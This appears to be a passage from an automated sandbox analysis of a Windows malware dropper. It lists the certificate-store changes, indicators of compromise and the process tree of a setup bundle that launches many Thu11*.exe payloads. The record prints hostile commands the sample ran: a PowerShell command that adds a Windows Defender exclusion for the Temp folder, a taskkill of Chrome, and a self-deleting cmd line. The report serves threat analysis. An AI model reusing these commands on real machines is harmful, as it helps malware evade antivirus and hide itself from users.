040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Thu115049bf2e.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 0f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a2000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	kerclean.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	services64.exe

Script User-Agent 8 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	77	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	82	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	10	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	11	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	16	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	32	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	34	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	76	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Thu11787d2b833e6.exeThu11f1187a97f50d9c.exemrZcYGtsjX9vOMhNiai00wUQ.exe

pid	process
1736	Thu11787d2b833e6.exe
1736	Thu11787d2b833e6.exe
1228
1228
1228
1228
1228
1228
1228
1228
1228
1228
1228
1228
1228
1228
1228
1228
1228
1680	Thu11f1187a97f50d9c.exe
1680	Thu11f1187a97f50d9c.exe
1680	Thu11f1187a97f50d9c.exe
1680	Thu11f1187a97f50d9c.exe
1680	Thu11f1187a97f50d9c.exe
1680	Thu11f1187a97f50d9c.exe
1680	Thu11f1187a97f50d9c.exe
1680	Thu11f1187a97f50d9c.exe
1680	Thu11f1187a97f50d9c.exe
1680	Thu11f1187a97f50d9c.exe
1680	Thu11f1187a97f50d9c.exe
1680	Thu11f1187a97f50d9c.exe
1680	Thu11f1187a97f50d9c.exe
1680	Thu11f1187a97f50d9c.exe
1680	Thu11f1187a97f50d9c.exe
1680	Thu11f1187a97f50d9c.exe
1680	Thu11f1187a97f50d9c.exe
1680	Thu11f1187a97f50d9c.exe
1680	Thu11f1187a97f50d9c.exe
1680	Thu11f1187a97f50d9c.exe
1680	Thu11f1187a97f50d9c.exe
1680	Thu11f1187a97f50d9c.exe
1680	Thu11f1187a97f50d9c.exe
1680	Thu11f1187a97f50d9c.exe
1680	Thu11f1187a97f50d9c.exe
1680	Thu11f1187a97f50d9c.exe
1680	Thu11f1187a97f50d9c.exe
1680	Thu11f1187a97f50d9c.exe
1680	Thu11f1187a97f50d9c.exe
1680	Thu11f1187a97f50d9c.exe
1680	Thu11f1187a97f50d9c.exe
1228
1228
1228
1228
1228
2268	mrZcYGtsjX9vOMhNiai00wUQ.exe
2268	mrZcYGtsjX9vOMhNiai00wUQ.exe
2268	mrZcYGtsjX9vOMhNiai00wUQ.exe
1228
2268	mrZcYGtsjX9vOMhNiai00wUQ.exe
1228
2268	mrZcYGtsjX9vOMhNiai00wUQ.exe
1228
2268	mrZcYGtsjX9vOMhNiai00wUQ.exe

Suspicious behavior: GetForegroundWindowSpam 9 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeiexplore.exeWerFault.exe

pid process

1228
2924 WerFault.exe
3724 WerFault.exe
3708 WerFault.exe
3284 WerFault.exe
2464 WerFault.exe
3024 WerFault.exe
3916 iexplore.exe
3672 WerFault.exe
Suspicious behavior: MapViewOfSection 4 IoCs

Processes:

Thu11787d2b833e6.exeatetbaaatetbaaatetbaa

pid process

1736 Thu11787d2b833e6.exe
4036 atetbaa
2804 atetbaa
1244 atetbaa

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Thu115049bf2e.exeThu1160e2804caf.exetaskkill.exeThu118764660749a3b.exeSetup.exe6256900.scrPublicDwlBrowser1100.exeWerFault.exe6.exeBearVpn 3.exe

description	pid	process
Token: SeShutdownPrivilege	1228
Token: SeShutdownPrivilege	1228
Token: SeShutdownPrivilege	1228
Token: SeShutdownPrivilege	1228
Token: SeShutdownPrivilege	1228
Token: SeDebugPrivilege	296	Thu115049bf2e.exe
Token: SeDebugPrivilege	1808	Thu1160e2804caf.exe
Token: SeDebugPrivilege	2336	taskkill.exe
Token: SeCreateTokenPrivilege	1040	Thu118764660749a3b.exe
Token: SeAssignPrimaryTokenPrivilege	1040	Thu118764660749a3b.exe
Token: SeLockMemoryPrivilege	1040	Thu118764660749a3b.exe
Token: SeIncreaseQuotaPrivilege	1040	Thu118764660749a3b.exe
Token: SeMachineAccountPrivilege	1040	Thu118764660749a3b.exe
Token: SeTcbPrivilege	1040	Thu118764660749a3b.exe
Token: SeSecurityPrivilege	1040	Thu118764660749a3b.exe
Token: SeTakeOwnershipPrivilege	1040	Thu118764660749a3b.exe
Token: SeLoadDriverPrivilege	1040	Thu118764660749a3b.exe
Token: SeSystemProfilePrivilege	1040	Thu118764660749a3b.exe
Token: SeSystemtimePrivilege	1040	Thu118764660749a3b.exe
Token: SeProfSingleProcessPrivilege	1040	Thu118764660749a3b.exe
Token: SeIncBasePriorityPrivilege	1040	Thu118764660749a3b.exe
Token: SeCreatePagefilePrivilege	1040	Thu118764660749a3b.exe
Token: SeCreatePermanentPrivilege	1040	Thu118764660749a3b.exe
Token: SeBackupPrivilege	1040	Thu118764660749a3b.exe
Token: SeRestorePrivilege	1040	Thu118764660749a3b.exe
Token: SeShutdownPrivilege	1040	Thu118764660749a3b.exe
Token: SeDebugPrivilege	1040	Thu118764660749a3b.exe
Token: SeAuditPrivilege	1040	Thu118764660749a3b.exe
Token: SeSystemEnvironmentPrivilege	1040	Thu118764660749a3b.exe
Token: SeChangeNotifyPrivilege	1040	Thu118764660749a3b.exe
Token: SeRemoteShutdownPrivilege	1040	Thu118764660749a3b.exe
Token: SeUndockPrivilege	1040	Thu118764660749a3b.exe
Token: SeSyncAgentPrivilege	1040	Thu118764660749a3b.exe
Token: SeEnableDelegationPrivilege	1040	Thu118764660749a3b.exe
Token: SeManageVolumePrivilege	1040	Thu118764660749a3b.exe
Token: SeImpersonatePrivilege	1040	Thu118764660749a3b.exe
Token: SeCreateGlobalPrivilege	1040	Thu118764660749a3b.exe
Token: 31	1040	Thu118764660749a3b.exe
Token: 32	1040	Thu118764660749a3b.exe
Token: 33	1040	Thu118764660749a3b.exe
Token: 34	1040	Thu118764660749a3b.exe
Token: 35	1040	Thu118764660749a3b.exe
Token: SeDebugPrivilege	2196	Setup.exe
Token: SeDebugPrivilege	2808	6256900.scr
Token: SeShutdownPrivilege	1228
Token: SeShutdownPrivilege	1228
Token: SeDebugPrivilege	2264	PublicDwlBrowser1100.exe
Token: SeShutdownPrivilege	1228
Token: SeDebugPrivilege	2924	WerFault.exe
Token: SeShutdownPrivilege	1228
Token: SeDebugPrivilege	2528	6.exe
Token: SeShutdownPrivilege	1228
Token: SeShutdownPrivilege	1228
Token: SeShutdownPrivilege	1228
Token: SeShutdownPrivilege	1228
Token: SeShutdownPrivilege	1228
Token: SeShutdownPrivilege	1228
Token: SeShutdownPrivilege	1228
Token: SeShutdownPrivilege	1228
Token: SeShutdownPrivilege	1228
Token: SeShutdownPrivilege	1228
Token: SeDebugPrivilege	2656	BearVpn 3.exe
Token: SeShutdownPrivilege	1228
Token: SeShutdownPrivilege	1228

Suspicious use of FindShellTrayWindow 7 IoCs

Processes:

Thu11b9fee5fd5b3c.tmpsetup_2.tmpiexplore.exe

pid process

760 Thu11b9fee5fd5b3c.tmp
1228
1228
1228
1228
2384 setup_2.tmp
3916 iexplore.exe

pid	process
760	Thu11b9fee5fd5b3c.tmp
1228
1228
1228
1228
2384	setup_2.tmp
3916	iexplore.exe

Suspicious use of SendNotifyMessage 37 IoCs

Processes:

pid	process
1228
1228
1228
1228
1228
1228
1228
1228
1228
1228
1228
1228
1228
1228
1228
1228
1228
1228
1228
1228
1228
1228
1228
1228
1228
1228
1228
1228
1228
1228
1228
1228
1228
1228
1228
1228
1228

Suspicious use of SetWindowsHookEx 8 IoCs

Processes:

iexplore.exeIEXPLORE.EXE

pid process

3916 iexplore.exe
3916 iexplore.exe
2648 IEXPLORE.EXE
2648 IEXPLORE.EXE
2648 IEXPLORE.EXE
2648 IEXPLORE.EXE
2648 IEXPLORE.EXE
2648 IEXPLORE.EXE

pid	process
3916	iexplore.exe
3916	iexplore.exe
2648	IEXPLORE.EXE
2648	IEXPLORE.EXE
2648	IEXPLORE.EXE
2648	IEXPLORE.EXE
2648	IEXPLORE.EXE
2648	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

setup_x86_x64_install.exesetup_installer.exesetup_install.execmd.exe

description	pid	process	target process
PID 1112 wrote to memory of 1128	1112	setup_x86_x64_install.exe	setup_installer.exe
PID 1112 wrote to memory of 1128	1112	setup_x86_x64_install.exe	setup_installer.exe
PID 1112 wrote to memory of 1128	1112	setup_x86_x64_install.exe	setup_installer.exe
PID 1112 wrote to memory of 1128	1112	setup_x86_x64_install.exe	setup_installer.exe
PID 1112 wrote to memory of 1128	1112	setup_x86_x64_install.exe	setup_installer.exe
PID 1112 wrote to memory of 1128	1112	setup_x86_x64_install.exe	setup_installer.exe
PID 1112 wrote to memory of 1128	1112	setup_x86_x64_install.exe	setup_installer.exe
PID 1128 wrote to memory of 1892	1128	setup_installer.exe	setup_install.exe
PID 1128 wrote to memory of 1892	1128	setup_installer.exe	setup_install.exe
PID 1128 wrote to memory of 1892	1128	setup_installer.exe	setup_install.exe
PID 1128 wrote to memory of 1892	1128	setup_installer.exe	setup_install.exe
PID 1128 wrote to memory of 1892	1128	setup_installer.exe	setup_install.exe
PID 1128 wrote to memory of 1892	1128	setup_installer.exe	setup_install.exe
PID 1128 wrote to memory of 1892	1128	setup_installer.exe	setup_install.exe
PID 1892 wrote to memory of 1784	1892	setup_install.exe	cmd.exe
PID 1892 wrote to memory of 1784	1892	setup_install.exe	cmd.exe
PID 1892 wrote to memory of 1784	1892	setup_install.exe	cmd.exe
PID 1892 wrote to memory of 1784	1892	setup_install.exe	cmd.exe
PID 1892 wrote to memory of 1784	1892	setup_install.exe	cmd.exe
PID 1892 wrote to memory of 1784	1892	setup_install.exe	cmd.exe
PID 1892 wrote to memory of 1784	1892	setup_install.exe	cmd.exe
PID 1892 wrote to memory of 948	1892	setup_install.exe	cmd.exe
PID 1892 wrote to memory of 948	1892	setup_install.exe	cmd.exe
PID 1892 wrote to memory of 948	1892	setup_install.exe	cmd.exe
PID 1892 wrote to memory of 948	1892	setup_install.exe	cmd.exe
PID 1892 wrote to memory of 948	1892	setup_install.exe	cmd.exe
PID 1892 wrote to memory of 948	1892	setup_install.exe	cmd.exe
PID 1892 wrote to memory of 948	1892	setup_install.exe	cmd.exe
PID 1892 wrote to memory of 1600	1892	setup_install.exe	cmd.exe
PID 1892 wrote to memory of 1600	1892	setup_install.exe	cmd.exe
PID 1892 wrote to memory of 1600	1892	setup_install.exe	cmd.exe
PID 1892 wrote to memory of 1600	1892	setup_install.exe	cmd.exe
PID 1892 wrote to memory of 1600	1892	setup_install.exe	cmd.exe
PID 1892 wrote to memory of 1600	1892	setup_install.exe	cmd.exe
PID 1892 wrote to memory of 1600	1892	setup_install.exe	cmd.exe
PID 1892 wrote to memory of 1096	1892	setup_install.exe	cmd.exe
PID 1892 wrote to memory of 1096	1892	setup_install.exe	cmd.exe
PID 1892 wrote to memory of 1096	1892	setup_install.exe	cmd.exe
PID 1892 wrote to memory of 1096	1892	setup_install.exe	cmd.exe
PID 1892 wrote to memory of 1096	1892	setup_install.exe	cmd.exe
PID 1892 wrote to memory of 1096	1892	setup_install.exe	cmd.exe
PID 1892 wrote to memory of 1096	1892	setup_install.exe	cmd.exe
PID 1892 wrote to memory of 1100	1892	setup_install.exe	cmd.exe
PID 1892 wrote to memory of 1100	1892	setup_install.exe	cmd.exe
PID 1892 wrote to memory of 1100	1892	setup_install.exe	cmd.exe
PID 1892 wrote to memory of 1100	1892	setup_install.exe	cmd.exe
PID 1892 wrote to memory of 1100	1892	setup_install.exe	cmd.exe
PID 1892 wrote to memory of 1100	1892	setup_install.exe	cmd.exe
PID 1892 wrote to memory of 1100	1892	setup_install.exe	cmd.exe
PID 1892 wrote to memory of 1008	1892	setup_install.exe	cmd.exe
PID 1892 wrote to memory of 1008	1892	setup_install.exe	cmd.exe
PID 1892 wrote to memory of 1008	1892	setup_install.exe	cmd.exe
PID 1892 wrote to memory of 1008	1892	setup_install.exe	cmd.exe
PID 1892 wrote to memory of 1008	1892	setup_install.exe	cmd.exe
PID 1892 wrote to memory of 1008	1892	setup_install.exe	cmd.exe
PID 1892 wrote to memory of 1008	1892	setup_install.exe	cmd.exe
PID 1784 wrote to memory of 1416	1784	cmd.exe	powershell.exe
PID 1784 wrote to memory of 1416	1784	cmd.exe	powershell.exe
PID 1784 wrote to memory of 1416	1784	cmd.exe	powershell.exe
PID 1784 wrote to memory of 1416	1784	cmd.exe	powershell.exe
PID 1784 wrote to memory of 1416	1784	cmd.exe	powershell.exe
PID 1784 wrote to memory of 1416	1784	cmd.exe	powershell.exe
PID 1784 wrote to memory of 1416	1784	cmd.exe	powershell.exe
PID 1892 wrote to memory of 1640	1892	setup_install.exe	cmd.exe

Views/modifies file attributes 1 TTPs 2 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exe

pid process

3856 attrib.exe
3768 attrib.exe

pid	process
3856	attrib.exe
3768	attrib.exe

C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1112
- C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1128
- - C:\Users\Admin\AppData\Local\Temp\7zS864EC813\setup_install.exe
    "C:\Users\Admin\AppData\Local\Temp\7zS864EC813\setup_install.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:1892
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1784
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        5⤵
        
        PID:1416
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu115049bf2e.exe
      4⤵
      Loads dropped DLL
      PID:948
    - - C:\Users\Admin\AppData\Local\Temp\7zS864EC813\Thu115049bf2e.exe
        
        Thu115049bf2e.exe
        5⤵
        Executes dropped EXE
        Modifies system certificate store
        Suspicious use of AdjustPrivilegeToken
        
        PID:296
      - C:\Users\Admin\AppData\Roaming\6256900.scr
        
        "C:\Users\Admin\AppData\Roaming\6256900.scr" /S
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2808
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 2808 -s 1680
        7⤵
        Program crash
        Suspicious behavior: GetForegroundWindowSpam
        
        PID:2464
      - C:\Users\Admin\AppData\Roaming\2764123.scr
        
        "C:\Users\Admin\AppData\Roaming\2764123.scr" /S
        6⤵
        
        PID:636
      - C:\Users\Admin\AppData\Roaming\4299185.scr
        
        "C:\Users\Admin\AppData\Roaming\4299185.scr" /S
        6⤵
        Executes dropped EXE
        
        PID:1212
      - C:\Users\Admin\AppData\Roaming\5702169.scr
        
        "C:\Users\Admin\AppData\Roaming\5702169.scr" /S
        6⤵
        
        PID:1560
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu11b9fee5fd5b3c.exe
      4⤵
      Loads dropped DLL
      PID:1600
    - - C:\Users\Admin\AppData\Local\Temp\7zS864EC813\Thu11b9fee5fd5b3c.exe
        
        Thu11b9fee5fd5b3c.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2004
      - C:\Users\Admin\AppData\Local\Temp\is-P1F05.tmp\Thu11b9fee5fd5b3c.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-P1F05.tmp\Thu11b9fee5fd5b3c.tmp" /SL5="$40136,138429,56832,C:\Users\Admin\AppData\Local\Temp\7zS864EC813\Thu11b9fee5fd5b3c.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of FindShellTrayWindow
        
        PID:760
        
        C:\Users\Admin\AppData\Local\Temp\is-E8ELU.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-E8ELU.tmp\Setup.exe" /Verysilent
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2068
        
        C:\Program Files (x86)\PDF Reader\PDF Reader\Setup.exe
        
        "C:\Program Files (x86)\PDF Reader\PDF Reader\Setup.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2196
        
        C:\Users\Admin\AppData\Local\Temp\sampason12345.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sampason12345.exe"
        9⤵
        Executes dropped EXE
        
        PID:2540
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu118764660749a3b.exe
      4⤵
      Loads dropped DLL
      PID:1096
    - - C:\Users\Admin\AppData\Local\Temp\7zS864EC813\Thu118764660749a3b.exe
        
        Thu118764660749a3b.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Modifies system certificate store
        Suspicious use of AdjustPrivilegeToken
        
        PID:1040
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        6⤵
        
        PID:3244
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        7⤵
        Kills process with taskkill
        
        PID:3276
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu117e9466431bbb9f.exe /mixone
      4⤵
      Loads dropped DLL
      PID:1100
    - - C:\Users\Admin\AppData\Local\Temp\7zS864EC813\Thu117e9466431bbb9f.exe
        
        Thu117e9466431bbb9f.exe /mixone
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:576
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "Thu117e9466431bbb9f.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS864EC813\Thu117e9466431bbb9f.exe" & exit
        6⤵
        
        PID:2280
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "Thu117e9466431bbb9f.exe" /f
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2336
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu116d4ab7efb7.exe
      4⤵
      Loads dropped DLL
      PID:1008
    - - C:\Users\Admin\AppData\Local\Temp\7zS864EC813\Thu116d4ab7efb7.exe
        
        Thu116d4ab7efb7.exe
        5⤵
        Executes dropped EXE
        
        PID:748
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu11787d2b833e6.exe
      4⤵
      Loads dropped DLL
      PID:1640
    - - C:\Users\Admin\AppData\Local\Temp\7zS864EC813\Thu11787d2b833e6.exe
        
        Thu11787d2b833e6.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:1736
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu113e650b5e.exe
      4⤵
      PID:936
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu112e5981b78.exe
      4⤵
      PID:1692
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu1160e2804caf.exe
      4⤵
      PID:988
    - - C:\Users\Admin\AppData\Local\Temp\7zS864EC813\Thu1160e2804caf.exe
        
        Thu1160e2804caf.exe
        5⤵
        Executes dropped EXE
        Modifies system certificate store
        Suspicious use of AdjustPrivilegeToken
        
        PID:1808
      - C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2832
        
        C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
        
